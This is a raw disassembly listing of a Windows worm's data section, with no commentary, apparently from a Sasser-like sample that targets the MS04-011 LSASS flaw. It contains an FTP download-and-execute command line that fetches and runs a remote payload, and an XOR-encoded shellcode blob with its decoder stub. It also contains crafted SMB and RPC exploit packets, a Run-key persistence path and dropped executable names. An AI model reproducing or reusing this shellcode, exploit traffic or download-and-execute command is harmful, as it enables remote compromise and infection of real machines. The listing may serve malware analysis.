; sub_401583+2DD�r ...
dword_405118 dd 71AB1AF4h ; DATA XREF: sub_40126C+DE�r
; sub_40137D+151�r ...
dword_40511C dd 71AB1746h ; DATA XREF: sub_401153+23�r
; sub_40126C+27�r ...
dword_405120 dd 71AB3C22h ; DATA XREF: sub_401153+50�r
; sub_40126C+51�r ...
dword_405124 dd 71AB3E5Dh ; DATA XREF: sub_401153+68�r
; sub_40126C+6C�r ...
dword_405128 dd 71AB1A6Dh ; DATA XREF: sub_401153+76�r
; sub_40126C+105�r ...
dword_40512C dd 71AB32CAh ; DATA XREF: sub_4010D2+18�r
dword_405130 dd 71AB401Ch ; DATA XREF: sub_4010D2+43�r
dword_405134 dd 71AB12F8h ; DATA XREF: sub_401045+8�r
; sub_4011D5+7�r ...
dword_405138 dd 71AB2BBFh ; DATA XREF: sub_4010D2+29�r
; sub_4011D5+1E�r ...
align 10h
dword_405140 dd 76D62A58h ; DATA XREF: sub_404D9C�r
dword_405144 dd 76D629BBh ; DATA XREF: sub_404DA2�r
dword_405148 dd 76D62A37h ; DATA XREF: sub_404D96�r
align 10h
dword_405150 dd 0FFFFFFFFh, 402A05h, 402A19h, 746E7572h, 20656D69h
; DATA XREF: sub_40292E+5�o
dd 6F727265h, 2072h, 534F4C54h, 72652053h, 0D726F72h, 0Ah
dd 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_406F34�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_4036B9+119�o
align 4
asc_40540C db 0Ah ; DATA XREF: sub_4036B9+F1�o
db 0Ah,0
align 10h
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_4036B9+D3�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_4036B9+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_4036B9+7D�o
align 4
dword_405448 dd 2 dup(0) ; DATA XREF: sub_40380C+39�o
; sub_4047EE+36�o
dword_405450 dd 0FFFFFFFFh, 403905h, 403909h ; DATA XREF: sub_40380C+5�o
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_404663+3D�o
align 10h
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_404663+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_404663+24�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_404663+D�o
align 4
dword_405498 dd 0FFFFFFFFh, 4048FEh, 404902h, 0FFFFFFFFh, 4049B2h, 4049B6h
; DATA XREF: sub_4047EE+5�o
dd 562Ch, 2 dup(0)
dd 56A6h, 50F0h, 5554h, 2 dup(0)
dd 57D0h, 5018h, 5640h, 2 dup(0)
dd 57DEh, 5104h, 5638h, 2 dup(0)
dd 5806h, 50FCh, 553Ch, 2 dup(0)
dd 586Ah, 5000h, 567Ch, 2 dup(0)
dd 58ACh, 5140h, 5 dup(0)
dd 77DD189Ah, 77DD59F0h, 77E2A571h, 77DD5ECCh, 77DD5C55h
dd 0
dd 77E73167h, 77E6E32Eh, 77E6D09Bh, 77E6E4FDh, 77E6D071h
dd 77E61BE6h, 77E6E4C8h, 77E99331h, 77E7A099h, 77E7AC37h
dd 77E684C6h, 77E715F7h, 77E73163h, 77F5157Dh, 77E7C2C4h
dd 77E7751Ah, 77E6BD13h, 77E705B0h, 77E805D8h, 77F5722Fh
dd 77E7980Ah, 77F516F8h, 77E6C703h, 77E7A13Fh, 77E7849Fh
dd 77E7C866h, 77E641EBh, 77E77CCEh, 77E79D8Ch, 77F6183Eh
dd 77F51597h, 77E79E34h, 77E7C726h, 77E76E0Bh, 77E78406h
dd 77E79C3Dh, 77E7C931h, 77E781F9h, 77E7A5FDh, 77E77405h
dd 77E77EE1h, 77E67702h, 77E79924h, 77E7C9E1h, 77E79F93h
dd 77E6177Ah, 77E7C938h, 77E7C486h, 77E75CB5h, 77E616B4h
dd 77E79C90h, 77EB9A84h, 77E9C5B1h, 0
dd 77D4C96Ah, 77D6ADD7h, 0
dd 762211EFh, 0
dd 71AB41DAh, 71AB3ECEh, 71AB5DE2h, 71AB868Dh, 71AB5690h
dd 71AB1AF4h, 71AB1746h, 71AB3C22h, 71AB3E5Dh, 71AB1A6Dh
dd 71AB32CAh, 71AB401Ch, 71AB12F8h, 71AB2BBFh, 0
dd 76D62A58h, 76D629BBh, 76D62A37h, 0
dd 654D0000h, 67617373h, 786F4265h, 41h, 72707377h, 66746E69h
dd 53550041h, 32335245h, 6C6C642Eh, 0
aGetprocaddress db 'GetProcAddress',0
align 4
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 736C0000h, 70637274h
dd 4179h, 6C5F0000h, 736F6C63h, 65h, 72776C5Fh, 657469h
dd 6C5F0000h, 6565736Ch, 6Bh, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 4
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread_0 db 'CreateThread',0
align 4
aWinexec db 'WinExec',0
dd 65530000h, 72685474h, 50646165h, 726F6972h, 797469h
dd 65470000h, 72754374h, 746E6572h, 65726854h, 6461h, 65470000h
dd 73614C74h, 72724574h, 726Fh, 72430000h, 65746165h, 6574754Dh
dd 4178h, 65470000h, 63695474h, 756F436Bh, 746Eh, 6F430000h
dd 69467970h, 41656Ch, 65470000h, 6E695774h, 73776F64h
dd 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h, 6C6C642Eh
dd 53570000h, 32335F32h, 6C6C642Eh, 0
aInternetgetcon db 'InternetGetConnectedState',0
aWininet_dll db 'WININET.dll',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 6C654467h, 56657465h, 65756C61h, 41h, 4F676552h
dd 4B6E6570h, 417965h, 62410000h, 5374726Fh, 65747379h
dd 7568536Dh, 776F6474h, 416Eh, 65520000h, 74655367h, 756C6156h
dd 41784565h, 44410000h, 49504156h, 642E3233h, 6C6Ch, 63490000h
dd 6C43706Dh, 4865736Fh, 6C646E61h, 65h, 706D6349h, 646E6553h
dd 6F686345h, 0
aIcmpcreatefile db 'IcmpCreateFile',0
align 4
aIphlpapi_dll db 'iphlpapi.dll',0
align 4
aGetmodulehandl db 'GetModuleHandleA',0
align 10h
aGetstartupinfo db 'GetStartupInfoA',0
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
dd 69737265h, 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentproc db 'GetCurrentProcess',0
align 4
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 4
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 5773676Eh, 0
aSethandlecount db 'SetHandleCount',0
align 10h
dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6C694674h
dd 70795465h, 65h, 70616548h, 74736544h, 796F72h, 65480000h
dd 72437061h, 65746165h, 0
aVirtualfree db 'VirtualFree',0
dd 65480000h, 72467061h, 6565h, 74520000h, 776E556Ch, 646E69h
dd 72570000h, 46657469h, 656C69h, 754D0000h, 4269746Ch
dd 54657479h, 6469576Fh, 61684365h, 72h, 53746547h, 6E697274h
dd 70795467h, 4165h, 65470000h, 72745374h, 54676E69h, 57657079h
dd 0
aGetcpinfo db 'GetCPInfo',0
align 4
aGetacp db 'GetACP',0
align 4
dd 65470000h, 4D454F74h, 5043h, 65480000h, 6C417061h, 636F6Ch
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 65480000h, 65527061h
dd 6F6C6C41h, 63h, 614D434Ch, 72745370h, 41676E69h, 0
aLcmapstringw db 'LCMapStringW',0
align 4
dd 143h dup(0)
dword_406000 dd 0 ; DATA XREF: sub_402BB1+1F�o
dword_406004 dd 0 ; DATA XREF: sub_402BB1+1A�o
dword_406008 dd 0 ; DATA XREF: sub_402BB1+10�o
dd offset sub_403D5B
dword_406010 dd 0 ; DATA XREF: sub_402BB1:loc_402BBC�o
dword_406014 dd 0 ; DATA XREF: sub_402C00+65�o
dword_406018 dd 0 ; DATA XREF: sub_402C00:loc_402C60�o
dword_40601C dd 0 ; DATA XREF: sub_402C00+76�o
dword_406020 dd 4 dup(0) ; DATA XREF: sub_402C00:loc_402C71�o
off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40126C+AA�r
; "echo off&echo open %s 1023>>cmd.ftp&ech"...
; ---------------------------------------------------------------------------
loc_406034: ; DATA XREF: sub_401583+132�o
; sub_401583+1AB�o
jmp short loc_406046
; =============== S U B R O U T I N E =======================================
sub_406036 proc near ; CODE XREF: sub_406036:loc_406046�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: sub_406036+C�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
loc_406046: ; CODE XREF: .text:loc_406034�j
call sub_406036
loc_40604B: ; CODE XREF: sub_406036+E�j
jo short near ptr dword_405AF4+4EEh
cwde
cdq
cdq
retn
sub_406036 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_401583+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_40137D+15D�o
; sub_401583+2BD�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40137D+188�o
; sub_401583+2EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_406304 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40137D+1AD�o
; sub_401583+315�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40137D+53�o
; sub_401583+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_40137D+85�o
; sub_401583+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_406448 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+369�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4064B4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+392�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401493+2 ; DATA XREF: sub_401583+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 ; DATA XREF: sub_401583+47E�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; DATA XREF: sub_401583+16B�r
; sub_401583+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
off_4068C8 dd offset dword_406924 ; DATA XREF: sub_40219B:loc_4021F3�r
; sub_40219B+B6�r
dd offset dword_406918
off_4068D0 dd offset dword_406910 ; DATA XREF: sub_401B59+1A�r
; sub_401B59+2D�r
off_4068D4 dd offset dword_406908 ; DATA XREF: sub_401B59+77�r
; sub_401B59+84�r
off_4068D8 dd offset dword_406900 ; DATA XREF: sub_401B59+A8�r
; sub_401B59+B5�r
off_4068DC dd offset dword_4068F8 ; DATA XREF: sub_401B59+2C6�r
; sub_401B59+2D3�r ...
off_4068E0 dd offset dword_4068F0 ; DATA XREF: sub_401B59+184�r
; sub_401B59+191�r
off_4068E4 dd offset dword_4068E8 ; DATA XREF: sub_401B59+1B9�r
; sub_401B59+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fh ; DATA XREF: .text:off_4068E4�o
dword_4068F0 dd 20303032h, 0A4B4Fh ; DATA XREF: .text:off_4068E0�o
dword_4068F8 dd 20363232h, 0A4B4Fh ; DATA XREF: .text:off_4068DC�o
dword_406900 dd 20303332h, 0A4B4Fh ; DATA XREF: .text:off_4068D8�o
dword_406908 dd 20313333h, 0A4B4Fh ; DATA XREF: .text:off_4068D4�o
dword_406910 dd 20303232h, 0A4B4Fh ; DATA XREF: .text:off_4068D0�o
dword_406918 dd 5341534Ch, 56532053h, 52h ; DATA XREF: .text:004068CC�o
dword_406924 dd 7361736Ch, 652E7373h, 6578h ; DATA XREF: .text:off_4068C8�o
aEchoOffEchoOpe db 'echo off&echo open %s 1023>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_upload.exe>>cmd.ftp&echo bye>>'
db 'cmd.ftp&echo on&ftp -s:cmd.ftp&%i_upload.exe&echo off&del cmd.ftp'
db '&echo on',0Ah,0
align 10h
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
asc_406A0C db 0Dh,0Ah,0 ; DATA XREF: sub_401210+40�o
align 10h
aCFtplog_txt db 'c:\ftplog.txt',0 ; DATA XREF: sub_401210+9�o
align 10h
aSC db '%s%c',0 ; DATA XREF: sub_40137D+1DF�o
align 4
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_40137D+20�o
; sub_401583+23�o
align 4
dword_406A34 dd 6EB06EBh, 0 ; DATA XREF: sub_401583+1CC�o
dword_406A3C dd 1CEC8166h ; DATA XREF: sub_401583+D�r
dword_406A40 dd 0E4FF07h ; DATA XREF: sub_401583+18�r
dword_406A44 dd 302E35h ; DATA XREF: sub_401A69+4A�o
dword_406A48 dd 312E35h ; DATA XREF: sub_401A69+27�o
aQuit db 'QUIT',0 ; DATA XREF: sub_401B59+2E4�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_401B59+1A2�o
align 4
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: sub_401B59+173�o
; sub_401F4B+79�o
word_406A68 dw 2Ch ; DATA XREF: sub_401B59+EE�r
align 4
aPort db 'PORT',0 ; DATA XREF: sub_401B59+C6�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_401B59+95�o
align 4
aUser db 'USER',0 ; DATA XREF: sub_401B59+64�o
align 4
asc_406A84: ; DATA XREF: sub_401F4B+157�o
unicode 0, < >,0
a1_YourComputer db '1. Your computer is affected by the MS04-011 vulnerability',0Dh,0Ah
; DATA XREF: sub_4020D9+B2�o
db '2. It can be that dangerous computer viruses similar',0Dh,0Ah
db ' the Blaster worm infect your computer',0Dh,0Ah
db '3. Please update your computer with the MS04-011 LSASS patch',0Dh,0Ah
db ' from the www.microsoft.com website',0Dh,0Ah
db '4. This is an message from the SkyNet Team for',0Dh,0Ah
db ' malicious activity prevention',0Dh,0Ah,0
align 4
aSkynet db 'SkyNet',0 ; DATA XREF: sub_4020D9+AD�o
align 4
aSkynetnotice db 'SkynetNotice',0 ; DATA XREF: sub_4020D9+3F�o
align 4
aDrvddll_exe db 'Drvddll_exe',0 ; DATA XREF: sub_40219B+EB�o
aDrvsys_exe db 'drvsys.exe',0 ; DATA XREF: sub_40219B+DF�o
align 4
aSsgrate_exe db 'ssgrate.exe',0 ; DATA XREF: sub_40219B+CE�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_40219B+8B�o
align 10h
asc_406C50: ; DATA XREF: sub_40219B+4B�o
unicode 0, <\>,0
align 10h
off_406C60 dd offset sub_402BEF ; DATA XREF: sub_402A24+1C�r
dword_406C64 dd 2 ; DATA XREF: sub_403680+E�r
; sub_4036B9+46�r
align 10h
off_406C70 dd offset word_406C7A ; DATA XREF: sub_402900+1E�r
; sub_402B3C+12�r ...
dd offset word_406C7A
db 2 dup(0)
word_406C7A dw 20h ; DATA XREF: sub_403966+18�r
; .text:off_406C70�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406E7C dd 1 ; DATA XREF: sub_402900�r
dd 2Eh, 1
dword_406E88 dd 0C0000005h ; DATA XREF: sub_402DF4+A�r
; sub_402DF4+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406F00 dd 3 ; DATA XREF: sub_402CB3+58�r
dword_406F04 dd 7 ; DATA XREF: sub_402CB3+5E�r
dword_406F08 dd 0Ah ; DATA XREF: sub_402DF4+4�r
dword_406F0C dd 8Ch ; DATA XREF: sub_402CB3+82�r
; sub_402CB3+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406F1C dd 19930520h, 4 dup(0) ; DATA XREF: .text:0040357F�o
; sub_403586+2�o
dword_406F30 dd 2 ; DATA XREF: sub_4036B9+E�o
; sub_4036B9+28�r
off_406F34 dd offset aR6002FloatingP ; DATA XREF: sub_4036B9+FC�r
; sub_4036B9+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 405390h, 9, 405364h, 0Ah, 405340h, 10h, 405314h
dd 11h, 4052E4h, 12h, 4052C0h, 13h, 405294h, 18h, 40525Ch
dd 19h, 405234h, 1Ah, 4051FCh, 1Bh, 4051C4h, 1Ch, 40519Ch
dd 78h, 40518Ch, 79h, 40517Ch, 7Ah, 40516Ch, 0FCh, 406A0Ch
dd 0FFh, 40515Ch
byte_406FC0 db 1 ; DATA XREF: sub_4036B9+1B�o
; sub_403997+E1�r
db 2, 4, 8
align 8
dword_406FC8 dd 3A4h ; DATA XREF: sub_403997+2F�o
dword_406FCC dd 82798260h, 21h, 0 ; DATA XREF: sub_403997+11D�r
dword_406FD8 dd 0DFA6h ; DATA XREF: sub_403997+C0�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h
dword_40707C dd 0 ; DATA XREF: .text:00406624�o
; .text:00406638�o ...
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_4070B8 dd 3F8h ; DATA XREF: sub_403997+3C�o
; sub_403DE4+5�r
align 10h
dword_4070C0 dd 5A430D7Eh ; DATA XREF: sub_401000�r
; sub_401000+10�w ...
dword_4070C4 dd 0 ; DATA XREF: sub_401210�w
dword_4070C8 dd 0 ; DATA XREF: sub_40126C+89�o
; sub_40137D+C�o ...
dword_4070CC dd 0 ; DATA XREF: sub_402770+3B�r
; sub_402770+91�w
dword_4070D0 dd 0 ; DATA XREF: sub_40292E+84�w
; sub_402E8F:loc_402EA1�r ...
align 8
dword_4070D8 dd 0 ; DATA XREF: sub_402A24�r sub_402A49�r ...
dd 3 dup(0)
dword_4070E8 dd 0A28h ; DATA XREF: sub_40292E+52�w
dword_4070EC dd 501h ; DATA XREF: sub_40292E+49�w
dword_4070F0 dd 5 ; DATA XREF: sub_40292E+3E�w
dword_4070F4 dd 1 ; DATA XREF: sub_40292E+30�w
dword_4070F8 dd 1 ; DATA XREF: sub_402F48+91�w
dword_4070FC dd 0E80B00h ; DATA XREF: sub_402F48+89�w
dd 0
dword_407104 dd 0E80A80h ; DATA XREF: sub_402E8F+44�w
dd 3 dup(0)
off_407114 dd offset aCM_unpackerPac ; DATA XREF: sub_402F48+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_40711C db 0 ; DATA XREF: sub_402C00+2D�w
align 10h
dword_407120 dd 0 ; DATA XREF: sub_402C00+27�w
dword_407124 dd 0 ; DATA XREF: sub_402C00+4�r
; sub_402C00+8B�w
dword_407128 dd 0 ; DATA XREF: sub_402CB3+3A�r
; sub_402CB3+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_402F48:loc_402F5F�o
; .text:off_407114�o
align 4
dd 3Ah dup(0)
dword_407230 dd 1 ; DATA XREF: sub_403195+2�r
; sub_403195+23�w ...
dword_407234 dd 0 ; DATA XREF: sub_403680+21�r
dword_407238 dd 1 ; DATA XREF: sub_40380C+26�r
; sub_40380C:loc_403876�w
dword_40723C dd 1 ; DATA XREF: sub_403997:loc_403B12�r
; sub_403B30+4�w ...
dword_407240 dd 0 ; DATA XREF: sub_404663+3�r
; sub_404663+2E�w ...
dword_407244 dd 0 ; DATA XREF: sub_404663+43�w
; sub_404663:loc_4046B2�r
dword_407248 dd 0 ; DATA XREF: sub_404663+4A�w
; sub_404663+60�r
dd 2 dup(0)
dword_407254 dd 0 ; DATA XREF: sub_40380C+7B�r
dd 3 dup(0)
dword_407264 dd 0 ; DATA XREF: sub_40380C+A6�r
; sub_403B30+3A�r ...
dd 0
dword_40726C dd 1 ; DATA XREF: sub_4047EE+28�r
; sub_4047EE+4C�w ...
dword_407270 dd 0 ; DATA XREF: sub_403DA6�r
dword_407274 dd 0 ; DATA XREF: sub_404A3D�r
dword_407278 dd 10h ; DATA XREF: sub_403E1A+32�w
; sub_4044B7+5�r ...
dword_40727C dd 0 ; DATA XREF: sub_403E83+239�r
; sub_403E83+259�r ...
dword_407280 dd 320650h ; DATA XREF: sub_403E1A+2D�w
; sub_403E83+310�w ...
dword_407284 dd 0 ; DATA XREF: sub_403E1A:loc_403E37�w
; sub_403E83+22C�r ...
dword_407288 dd 1 ; DATA XREF: sub_403E1A+24�w
; sub_403E58�r ...
dword_40728C dd 320650h ; DATA XREF: sub_403E1A+15�w
; sub_403E58+8�r ...
dword_407290 dd 4E4h ; DATA XREF: sub_403997+14�r
